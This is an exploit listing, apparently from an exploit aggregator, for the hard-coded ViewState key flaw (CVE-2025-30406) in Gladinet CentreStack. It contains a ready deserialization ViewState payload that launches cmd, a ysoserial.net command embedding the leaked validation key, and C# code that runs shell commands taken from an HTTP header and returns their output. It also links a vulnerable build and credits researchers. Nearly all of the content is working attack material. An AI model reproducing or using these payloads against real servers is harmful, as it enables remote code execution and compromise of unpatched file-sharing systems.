Exploit for Use of Hard-coded Credentials in Gladinet Centrestack CVE-2020-0688 CVE-2025-30406

Name: Exploit for Use of Hard-coded Credentials in Gladinet Centrestack CVE-2020-0688 CVE-2025-30406
Rating: 5 (455 reviews)
2025-04-24 | CVSS 9.8
## https://sploitus.com/exploit?id=E37A1A6B-5547-5A26-A6E6-40DEFB224345
# Part1: Exploit
```powershell
λ CVE-2025-30406.exe rce.txt
__LASTFOCUS=&__VIEWSTATE=%2fwEytQYAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADXBDxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgDQogICAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiIA0KICAgIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2bDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZT0ie3g6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lPSJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2bDQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2bIi9jIG1zcGFpbnQiPC9TeXN0ZW06U3RyaW5nPg0KICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KPC9SZXNvdXJjZURpY3Rpb25hcnk%2bCw%2b6OKTmIbKTjW1wQMhlIOL9OQNSS8Y3iATUxLBZnYed
```

Test on 16.1.10296.56315, download link:

>https://s3.amazonaws.com/gladinetsupport/16.1.10296.56315/gladinet/GCE10296.iso

![](https://github.com/user-attachments/assets/84e201ba-1a6b-4ae0-b39d-36ff94f6e497)

ysoserial.net command:

```powershell
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile --path="/portal/loginpage.aspx" --apppath="/portal/" --validationalg="HMACSHA256" --validationkey="5496832242CC3228E292EEFFCDA089149D789E0C4D7C1A5D02BC542F7C6279BE9DD770C9EDD5D67C66B7E621411D3E57EA181BBF89FD21957DCDDFACFD926E16" -c "ExploitClass.cs;System.Web.dll;System.dll;" --islegacy
```

```c#
class E
{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Headers["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }
}
```

![](https://github.com/user-attachments/assets/103625d4-41a1-4495-9df2-e49a9b1791a1)
# Part2: Credit
https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild  
https://github.com/zcgonvh/CVE-2020-0688  
https://x.com/_JohnHammond/status/1910997121639321866  
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-30406.yaml